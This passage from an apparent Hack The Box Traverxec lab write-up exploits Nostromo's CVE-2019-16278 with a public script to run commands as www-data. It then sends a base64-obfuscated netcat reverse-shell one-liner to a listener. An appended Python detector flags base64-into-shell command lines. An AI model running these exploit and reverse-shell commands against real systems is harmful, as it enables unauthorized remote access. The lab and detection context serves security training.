Remote Code Execution
As identified previously, the target Nostromo instance suffers from a remote code execution vulnerability, [CVE-2019-16278](https://nvd.nist.gov/vuln/detail/CVE-2019-16278). A [Python exploit script](https://www.exploit-db.com/exploits/47837) is available through ExploitDB.
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py
_____-2019-16278
_____ _______ ______ _____\ _____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | | | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / | \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>
Execution appears rather simple
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py $IP 80 id
HTTP/1.1 200 OK
date: Sun, 17 Sep 2023 07:46:26 GMT
server: nostromo 1.9.6
connection: close
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command execution is confirmed: the id output shows commands running as www-data.
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py $IP 80 'echo bWtmaWZvIC90bXAvc3JwbjsgbmMgMTAuMTAuMTQuMTcgOTk5OSAwPC90bXAvc3JwbiB8IC9iaW4vc2ggPi90bXAvc3JwbiAyPiYxOyBybSAvdG1wL3NycG4K | base64 -d | bash'
The command is executed on Traverxec, and the listener receives a connection from the target:
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.165] 58502
whoami
www-data
hostname
traverxec
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.165 netmask 255.255.255.0 broadcast 10.10.10.255
ether 00:50:56:b9:a2:46 txqueuelen 1000 (Ethernet)
RX packets 328392 bytes 25352806 (24.1 MiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 69163 bytes 13508761 (12.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the www-data user by exploiting CVE-2019-16278.
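
A detection-side view of the command pattern used above (`echo <base64> | base64 -d | bash` running as www-data), as an added example that is not part of the original write-up: it flags service-account command lines that pipe a base64 decode into a shell and decodes the argument for triage. The log format, field names and sample records are constructed for illustration.

```python
import base64
import shlex

SERVICE_USERS = {"www-data"}  # account shown by the page's `id` output
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed process-creation records in a hypothetical key=value format.
SAMPLE_LOG = """\
user=www-data parent=nhttpd cmd="echo aWQK | base64 -d | bash"
user=www-data parent=nhttpd cmd="/usr/bin/php-cgi index.php"
user=alice parent=bash cmd="echo aWQK | base64 --decode | sh"
user=www-data parent=nhttpd cmd="base64 -d /var/tmp/upload.b64"
"""

def parse_record(line):
    """Split one record; shlex keeps the quoted cmd value in one field."""
    return dict(field.split("=", 1) for field in shlex.split(line))

def decode_to_shell(cmd):
    """Return the decoded text ('' if not recoverable) when a base64-decode
    stage pipes into a shell; return None when there is no such pipeline."""
    # Naive split on '|': good enough for triage, ignores pipes inside quotes.
    stages = [shlex.split(s) for s in cmd.split("|")]
    for i in range(len(stages) - 1):
        stage, nxt = stages[i], stages[i + 1]
        decodes = stage[:1] == ["base64"] and {"-d", "--decode"} & set(stage)
        if not (decodes and nxt and nxt[0].rsplit("/", 1)[-1] in SHELLS):
            continue
        prev = stages[i - 1] if i else []
        if prev[:1] != ["echo"] or len(prev) < 2:
            return ""  # input came from a file or another command
        try:
            raw = base64.b64decode(prev[-1], validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return ""
        return raw.decode("utf-8", "replace")
    return None

def detect(log_text):
    """Return (record, decoded) pairs for service accounts decoding into a shell."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        decoded = decode_to_shell(rec["cmd"])
        if rec["user"] in SERVICE_USERS and decoded is not None:
            hits.append((rec, decoded))
    return hits

if __name__ == "__main__":
    for rec, decoded in detect(SAMPLE_LOG):
        print(f"ALERT user={rec['user']} parent={rec['parent']} decoded={decoded!r}")
```

Only the first sample record alerts: the second and fourth have no decode-into-shell pipeline, and the third runs under an interactive user rather than a service account.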